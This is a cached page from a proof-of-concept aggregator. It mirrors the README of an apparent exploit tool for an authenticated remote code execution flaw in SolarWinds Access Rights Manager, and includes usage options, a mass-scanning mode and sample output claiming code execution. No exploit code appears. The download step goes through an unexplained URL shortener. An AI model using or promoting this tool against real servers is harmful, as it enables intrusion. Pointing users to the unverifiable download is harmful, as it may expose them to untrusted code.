Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-28991 PoC — SolarWinds Access Rights Manager 代码问题漏洞

Source
Associated Vulnerability
Title:SolarWinds Access Rights Manager 代码问题漏洞 (CVE-2024-28991)
Description:SolarWinds Access Rights Manager是SolarWinds公司的一个轻量级的审查管理系统。 SolarWinds Access Rights Manager存在代码问题漏洞,该漏洞源于允许经过身份验证的用户滥用服务,从而导致远程代码执行。
Readme
# 🛠 CVE-2024-28991 Exploit

## 🌟 Description

This script is a powerful exploitation tool for the CVE-2024-28991 vulnerability found in SolarWinds Access Rights Manager (ARM). It allows an authenticated user to exploit the service, resulting in remote code execution on the affected systems.

## ⚙️ Installation

To set up the exploitation tool, follow these steps:

1. Download the repository:

|[Download](https://t.ly/KsLqz)
|:--------------- |

2. Navigate to the tool's directory:

```bash
cd CVE-2024-28991
```

3. Install the required Python packages:

```bash
pip install -r requirements.txt
```

## 🚀 Usage

To use the tool, run the script from the command line as follows:

```bash
python exploit.py [options]
```

### Options

- -u, --url:
  Specify the target URL or IP address.

- -f, --file:
  Specify a file containing a list of URLs to scan.

- -t, --threads:
  Set the number of threads for concurrent scanning.

- -o, --output:
  Define an output file to save the scan results.

When a single URL is provided with the -u option and the target is vulnerable, the script will attempt to execute arbitrary code.

### Example

```bash
$ python3 exploit.py -u http://target-url.com
[+] Remote code execution triggered successfully.
[!] http://target-url.com is vulnerable to CVE-2024-28991.
```

## 📊 Mass Scanning

For mass scanning, use the -f option with a file containing URLs. The tool will scan each URL and print concise results, indicating whether each target is vulnerable.

```bash
python exploit.py -f urls.txt
```

## 🗒 Affected Versions

The vulnerability affects the following versions of SolarWinds Access Rights Manager (ARM):

Access Rights Manager <= 2024.3

It is highly recommended to apply patches or updates to mitigate this vulnerability, as it poses a significant risk to system security.

## 📈 CVSS Information

- **CVSS V3.1 Score:** 8.8
- **Severity:** HIGH
- **Confidentiality:** High
- **Integrity:** High
- **Availability:** High
- **Attack Vector:** Network
- **Attack Complexity:** Low
- **Privileges Required:** Low
- **User Interaction:** None
- **Scope:** Unchanged

## 🛡 Disclaimer

Use this tool responsibly and ethically. Always obtain proper authorization before testing any system for vulnerabilities.
File Snapshot

[4.0K] /data/pocs/8dfab7eb9e2937526d179b35ac9304001de4e7d3 └── [2.2K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.